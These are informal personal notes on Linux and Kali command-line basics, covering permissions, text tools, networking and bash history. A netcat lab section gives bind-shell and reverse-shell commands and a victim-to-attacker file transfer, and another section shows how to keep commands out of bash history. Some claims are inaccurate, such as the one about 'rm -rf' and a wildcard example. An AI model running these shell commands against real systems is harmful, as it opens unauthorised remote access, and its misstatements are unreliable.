* </mnt> used for mount points. HDs , usbs, cd roms must be mounted to some directory in the file system tree before being used. Debian sometimes uses /cdrom instead of /mnt

* </proc>  this is a special and interstinng directory. its actually a virtual directory  because it doesnt actually exist. it contains info on the kernel and all processes info. contains special files that permit access to the current configuration of the system

file permissions are specified in terms of the permissions of 1. the file owner (self) 2. the files group members (group/business) 3. and everyone else (other)

* she-bang is #! and you would use this when writing a shell script at the beginning of the script. You will need to point it to teh interpreter which in linux bash is  #!/bin/sh

• Ls  to list whats in the directory, ls  -la for hidden files • When using cd to change directories remember the 2 ways is absolute path and relative path. Absolute path is in relation to the root directory, so if I wanted to change to the desktop from anywhere I type the absolute path to the desktop which is  cd  /root/desktop. If I was in the root directory I could use the relative path to the desktop (that is relative to your current location) with cd Desktop (it is case sensitive). The command cd  .. takes you one level back in the filesystem • Man pages: to learn more about the ls command you can do man ls and that will list the man page about it. Q quit • Adding a user: by default the kali login is a privileged account because many tools require root to run. You should add an underprivileged account for everyday use. Adduser ray  this will add a user and put it in group 1000 and create a home directory at /home/ray. It will then ask for a password twice, put one in. then it will ask for extra values optional like full name, work number , etc. Now I may need to do something as root as my regular user so I need superuser privileges added to my new user. We do that with adduser ray sudo . now if I want to switch to my regular user I do  su ray . lets say I want to test if its underprivileged, try typing in  adduser smojoe and see that it says command not found, that’s because we are underprivileged. Now try sudo adduser smojoe and put your password it and see that you can now add the user. If you want to switch back to root type su, then the root password which by default is toor. To change your root password type passwd and hit enter, then type in the new password twice. • Creating a new file: to make a new empty file type touch raysfile . • Make a new directory: mkdir raysdirectory • Copying, moving and removing files: to copy a file use the cp command with the syntax of cp source destination: cp /root/raysfile raysfile2. To move a file its identical to copy except you use mv: mv /root/raysfile2 /root/raysdirectory. To remove a file type rm raysfile2. (side note , rm  -rf deletes the entire filesystem because  the r removes recursively) • Adding text to a file: echo by itself will just repeat what you type in the terminal window. So echo im captain awesome will repeat this phrase back to you in the terminal. To put it in a file you use the > redirect command: echo im captain awesome > raysfile. To see the contents of it you type: cat raysfile. Now lets say I want to add more text to it, if you type echo im captain awesome again  > raysfile and then cat it, you will notice that it overwrote what was there previously. We need to append with  >> instead of the single >. So the command would be: echo im captain awesome a third time  >> raysfile. Cat that and you will see it appended it to a new line • File permissions: lets see what permissions my file has:  ls  -l raysfile. From left to right its first the file type (if it’s a directory or a file) then it’s the permissions (-rw-r-r--) then the number of links to the file (1), then the user and group that own the file (root), then the file size (however many bytes), then the last time the file was edited (the date and time) and finally the name of the file (raysfile).  For permissions linux has read (r), write (w), and execute (x). there is also 3 sets of user permissions for owner, group, and all users. So the first 3 parts are for owner, the next 3 are for group and the final 3 are for all users. So  the  -rw-r-r—means that the owner gets read/write, the group gets read only, and all other users get read only. Because I made the file while logged in as root you will see root root after the permissions. To change permissions for a file use the chmod command, when specifying the permissions use number 0-7. So they would be like: o 7      full permissions       111  binary o 6      read and write         110  binary o 5      read and execute    101  binary o 4      read only                 100  binary o 3     write and execute     011  binary o 2      write only                 010  binary o 1      execute only  001  binary o 0      none                         000  binary • Chmod: so lets say I want to give the owner execute, read and write and the group and everyone else gets no permissions I would do chmod 700 raysfile. This is because the order for that in the binary of 111 is rwx as in read first then write then execute. The first initial dash – is stating that it’s a file, if it had a D there it would indicate that it is a directory. • you can also do it by letter notation where: u = user owner, g = group owner, o = others or world, and a = all. so for example, if the file is already rwx------ and then i type chmod g+w, then it would read rwx-w----, meaning i added (+) the write capability to the group section.  if i did chmod a+x that would now read rwx-wx--x meaning everybody (owner, group and world) have execute privileges now. if i did chmod a-x, now it would read rw--w---- meaning i have removed the execute privilege from everyone. • Editing files: your not always going to have a gui text editor, especially when you break into a linux and get shell, so you need to be familiar with the shell version editors like nano and vi. So if I want to make a new file and edit it simultaneously I would type: nano testfile.txt. once this opens up you can start entering text (enter in chuck Norris knows victorias secret)and when your done you do ctrl-x and it will ask you if you want to save it, type Y and hit enter. Lets bring that testfile back up by typing nano testfile.txt again, now lets do a search for the word chuck. Do a ctrl-w and in the box type chuck and hit enter, it should bring the flashing cursor to the c in chuck. Ctrl-x again and hit y to save and enter. Now lets try vi editor, type vi testfile.txt. in its current state you cant enter text yet because you have to hit I (as in the letter i) to insert and start adding text. Add some text to the file, when your done hit escape to come back to command mode, here you can do stuff like delete words by positioning the cursor over a letter and hitting D and depending on which arrow key you do it will delete the letter. For example the word test, if the cursor is over the “e” and I hit d and then right arrow it deletes the “e”. now the cursor is over the “s” and the word says “tst”. If I hit D while the cursor is over the “s” and hit my left arrow it deletes the “t”, keeping the “s” intact. Kinda weird stuff, I prefer nano. If you position the cursor on a line and hit dd it will delete the whole line. To exit vi and to write the changes to the file you type :wq  , w for write and q for quit. To learn more about these look to the man pages. • Data manipulation: lets make a file with touch raystest and make it look like below: 1  warrior   favorite 2  300  favorite2 3  braveheart  favorite3 • Grep: now lets find all instances of a word, type: grep favorite raystest. This should output all 3 lines, now lets type: grep warrior raystest, this should output just the line that has warrior on it. Notice how it dumps the whole line not just the word. Now lets just find and output a word from the file using the pipe command. Type: grep warrior raystest  |  cut   -d “ “   -f 2     in this command the  -d is for delimiter, which in this case would be the space that’s in the line (1 warrior favorite), and the  -f is the field in that line, being the second column. So its saying that in the second column if there is a word called warrior then output it to screen (warrior, 300 and braveheart are in the second column). Notice that if you rerun that command and change the  -f 2 to a  -f 3 it will output the word “favorite”, this is because it found the word warrior, so take that line and give me the value of whats in the 3rd column. • Sed:  you can also use sed to manipulate the data based on certain patterns and expressions. So lets say I had a long file and I needed to replace every instance of a certain word, sed is what you can use. With sed a / is the delimiter character, so lets say I wanted to replace every instance of favorite with awesome, type: sed  ‘s/favorite/awesome/’ raystest    this should output the text from our file but now it will say awesome, awesome2, and awesome3 • Awk: you can use to do pattern matching, so lets say in my file I wanted to find entries in the first column that were higher than 1, I would type: awk ‘$1 > 1’ raystest  this will output the 2nd and 3rd line of my file. Then if I only wanted it to say “1 warrior, 2  300,  and 3  braveheart” thus omitting the favorite words, I would type: awk ‘{print $1,$2;}’ raystest  thus telling it to print to screen only the first and second columns. • Starting services: when you do a fresh install of kali linux, postgresql and metasploit are not started by default, so if you want to start a service you type: service postgresql start, or service apache2 start, etc. now to make these start on bootup you have to manipulate the update-rc.d, so type: update-rc.d postgresql enable, then type in update-rc.d metasploit enable, now when you restart kali it will auto start these services • Setting up networking in kali: ifconfig is the command to list the same stuff ipconfig does. The command route will show you the routing tables including what your gateway is. So to set a static address just on the fly you find what your eth interface number is and type: ifconfig eth0 10.0.0.20/24 to put this in a class c address. To make sure the static address persists upon restarts you have to edit the file under /etc/network/interfaces. I just opened this in leafpad, note the auto lo, iface lo inet loopback lines, that’s for the loopback address. So comment out the next section which is probably the dhcp ones, right below it type in: auto eth0 iface eth0 inet static address 10.0.0.20 netmask 255.255.255.0 gateway 10.0.0.4

once that’s done, save it and then restart networking with the command: service networking restart

• To view network connections such as ports listening , etc, type: netstat  -antp • Netcat: they call this the swiss army knife for hackers, lets do some exercises with it. First start by looking at the help file nc  -h 1. Lets check to see what ports are listening,(first start the apache2 service) type: nc  -v  <the address of your kali machine>  80 2. If you had started the apache service you should see it shows there as open 3. You can also set up a listener port, type:  nc  -lvp  1234 4. The l here is for listen, the v is for verbose, the p is to specify the port to listen on 5. Lets open up a second terminal window and use netcat to connect to the listener 6. In the second terminal type: nc 10.0.0.100  1234 and hit enter 7. The first terminal should show you connected 8. Now lets chat from the second terminal by typing : sup and hit enter 9. The word “sup” should show on the first terminal 10. In the first terminal do the same and it should show up on the second terminal 11. Ctrl –c (by the way you could demo this by using metasploitable2 and kali as well) 12. Now lets say we want our listener (victim) to give the second terminal (attacker) a bash shell when they connect 13. On first terminal type: nc  -lvp 1234  -e  /bin/bash (the  -e is to set an executable) 14. In the second terminal type:  nc 10.0.0.100  1234 and hit enter 15. It wont show anything but give it a second (you may have to hit enter on the first terminal to get it to register that it connected) and in the second terminal window type in whoami in the terminal and it should show root 16. Type in “id” and you should see the uid, gid and groups all showing root (0) 17. Ctrl-c 18. In addition to giving a shell from the listener you can also push a shell back to the listener 19. On the first terminal type: nc  -lvp 1234 20. On the second terminal type : nc 10.0.0.100 1234  -e /bin/bash (if doing this from win 7 replace /bin/bash with cmd.exe) 21. Back on your first terminal type in whoami and you should see root 22. Ctrl-c 23. Now lets send a file using netcat 24. In the first terminal type: nc  -lvp 1234  > netcatfile   (this is basically setting up an empty file on the listener to receive a file from the attacker and stuff it in this file) 25. In the second terminal type: nc 10.0.0.100  1234  <  raystest   (this is if you did the previous exercises) 26. Ctrl-c and now in the first terminal type: cat netcatfile, it should contain the same text from raystest (1 warrior favorite, etc)

* if i type history in bash it will show me all the commands that i recently typed. This is good for quick re commands but bad if a hacker gets a hold of this because it will also have the passwords i entered. so like if i was downloading with wget and i did like --user ray --password lamepassword http://somesite.com , this stuff gets logged in bash history. so how about we store our passwords in temporary variables like so: so for this we need to define a variable and we do this with the read command. read -e -s -p "pass?" password hitting enter should put us in an interactive prompt showing pass? and here is where we type in our password (you cant see it as you type it). -e is If the standard input is coming from a terminal, readline is used to obtain the line. -s is Silent mode. If input is coming from a terminal, characters are not echoed. -p mode is The prompt is displayed only if input is coming from a terminal. we can do echo $password to see the password i just typed. so now our wget command would look like this : wget --user ray --password "$password" http://somesite.com. run history again and see that the plain text password is not there.

* export HISTORYCONTROL=ignorespace is a way to get around having some stuff recorded in bash history. Now if i type a space (sometimes two spaces if it doesnt work) before my command it will not record it in bash history.

* also you can do export HISTIGNORE="pass:wget:ls"  and now the history will ignore anything with the words pass, wget, and ls.

* if i type password=1234 then echo $password , it will echo that value of 1234. but if i do unset password, this will release the variable and when i type echo $password i get nothing

* if i want to delete something out of history i type history -d and then the number of that entry in history. so like history -d 15  will delete whatever is in the 15th history entry.

keyboard shortcuts: if im at the end of a line, hitting my home key brings me back to beginning. the end key will bring you back to the end of the line. control + U clears the whole line (as opposed to me backspacing all of it). control + L clears the screen.

lsof will show a list of open files. I can check all the details including the tcp connections and addresses of a firefox instance i have up and running by typing lsof -i -n -P | grep firefox. the -i option selects the listing of files any of whose Internet address matches the address specified in i. If no address is specified, this option selects the listing of all Internet and x.25 (HP-UX) network files. the -n option inhibits the conversion of network numbers to host names for network files. Inhibiting conversion may make lsof run faster. It is also useful when host name lookup is not working properly. the -P  option inhibits the conversion of port numbers to port names for network files. Inhibiting the conversion may make lsof run a little faster. It is also useful when port name lookup is not working properly.

try netstat -tupac, lotsa info on your current connections

df command shows you the current free disk space, free command shows you the current free memory

pwd is print working directory

if i want to list all the stuff in Documents and list all the stuff in Pictures, I dont have to do 2 ls commands I just type ls Documents Pictures and it will show both (not backtrack but just regular ubuntu or similar distro

* ls -lt will add a time option to the list

* if i want to find out what type of file i have i type in file then the name of the file. example: file dateping.sh will tell me its a posix shell script

* less command lets me view a text files contents in terminal. Q will quit me out of there

* wildcards: if i wanted to move any files that start with the letters "up" i would type mv [up]*, now anything that starts with "u" , mv u*, now anything that starts with "u" and is the extension of .bin, mv u*.bin.

* filenames are case sensitive (like when moving and copying)

* spaces in filenames confuse bash as well

* two exclamation marks !! will run the last command

* type command will tell me what time of command im running. For instance if i wanted to see what type of command "type" is i type in type type, and it will show that its a shell builtin command

* which command will tell me where the commands are found. so if i type in which ls, it will show that the ls command is found in /bin/ls. it doesnt work for aliases to executables, like if i typed in which cd i get nothing as its just an alias for change directory

* help cd will tell me about the cd command

* mkdir --help will tell me help about mkdir

* man ls will give me the manual page for ls, I hit q to get out of it.

* apropos will show me all instances of a word , like apropos passwd.

* whatis will also tell me what a command is, whatis ls

* info will give me verbose info about a command

* i can chain commands together on the same line using semicolons between each command. So if i wanted to change to a directory and also look at its contents, then send me back to my working directory: cd /usr; ls;cd -   would do this for me

* now lets say i wanted to make that last command an alias called foo, i would do alias foo='cd /usr;ls;cd -'  now i can just type foo and it will run it. This will not persist when i close the terminal however. to make it permanent, gedit .bashrc and under the section that has aliases, put your alias there and save it. then close the current terminal and reopen it and you should be able to use it now with the alias name. if you do type myfoo you will see all the commands that are strung. You can move that bashrc file to other machines to persist your aliases across other machines

* unalias foo will take away that alias

* all the programs in the terminal give you some sort of output, whther it be a result or an error message. these are sent over to a file called standard output, stdout for short. that messages to a file called standard error, stderr for short. by default these files arent saved to the disk. the keyboard is automatically tied to the stdin , which is standard input. so we can change where the output goes and where the input comes from, rather than just the keyboard. so if i did ls -l /usr/bin in the terminal it will print to screen, but if i do ls -l /usr/bin > ls-output.txt, it will output it to a text file. Now if i had this file and typed ls -l /bin/usr > ls-output.txt, this will give an error because /bin/usr doesnt exist. This will also overwrite whatever was previously in the ls-output.txt file. this means it will be empty because it will have started writing to it , but stopped when it got this error. now if i want to append files to an existing one and not overwrite the data in it it  use >> so like ls -l /usr/bin >> ls-output.txt, and then ls -l /usr/bn >> ls-output.txt will make this file doubled in size.

* cat is used to display the results as well, like cat ls-output.txt will print to console all of the content in that file. i can also use it to concatenate or join various files that are in succession. example, if i had movie.avi.001, movie.avi.002, and movie.avi.003 and i wanted to join them together i would type cat movie.avi.0* > movie.avi. I can also use cat to make content for a new text file. So if i type cat > newtext.txt and hit enter it will just wait there for input. So if i type the words this is a test and hit enter then type of the broadcast network and hit ctrl + d, ctrl + d , it will bring me back to the prompt. then if i open that text file it will have the content in there as i typed it.

* echo with a letter then an asterix will show you all the files in your current directory that start with that letter. echo *p will show all the files in this directory that start with p. this is also case sensitive. echo [[:upper:]]* will show everything in this dir that is uppercased.

* to find hidden files iin the directory your in : ls -d .[!.]?*  you could also use ls -la
